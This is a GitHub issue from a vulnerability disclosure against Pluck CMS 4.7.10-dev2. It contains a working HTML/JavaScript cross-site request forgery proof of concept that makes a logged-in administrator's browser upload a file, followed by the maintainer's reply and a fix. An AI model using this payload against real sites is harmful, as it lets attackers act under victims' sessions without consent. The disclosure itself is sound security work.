Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is a CSRF vulnerability can add txt file. #82

Closed
Lilc1 opened this issue Oct 21, 2019 · 3 comments
Closed

There is a CSRF vulnerability can add txt file. #82

Lilc1 opened this issue Oct 21, 2019 · 3 comments
Labels
Password Required for exploit Resolved

Comments

@Lilc1
Copy link

Lilc1 commented Oct 21, 2019

This problem was found in Pluck v4.7.10-dev2. This CSRF vulnerability can add a txt file via /admin.php?action=abc.
poc

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/172.16.1.234\/pluck\/admin.php?action=files", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------18467633426500");
        xhr.withCredentials = true;
        var body = "-----------------------------18467633426500\r\n" + 
          "Content-Disposition: form-data; name=\"filefile\"; filename=\"1.txt\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "hacker\r\n" + 
          "-----------------------------18467633426500\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "-----------------------------18467633426500--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Verification
image
The uploaded file is stored in the /files/ directory.
image
@BSteelooper
Copy link
Contributor

You have to first be logged in to pluck. This is not possible when you are not logged in. when you know the password you can simple browse the file upload page.

@BSteelooper BSteelooper reopened this Oct 21, 2019
BSteelooper pushed a commit that referenced this issue Oct 21, 2019
Issue #81, issue #82 and issue #83
14ee987
@BSteelooper
Copy link
Contributor

Could you please test the latest dev release 4.7.10-dev4?
https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

@BSteelooper
Copy link
Contributor

Have you retested with the latest dev version?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Password Required for exploit Resolved
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@BSteelooper @Lilc1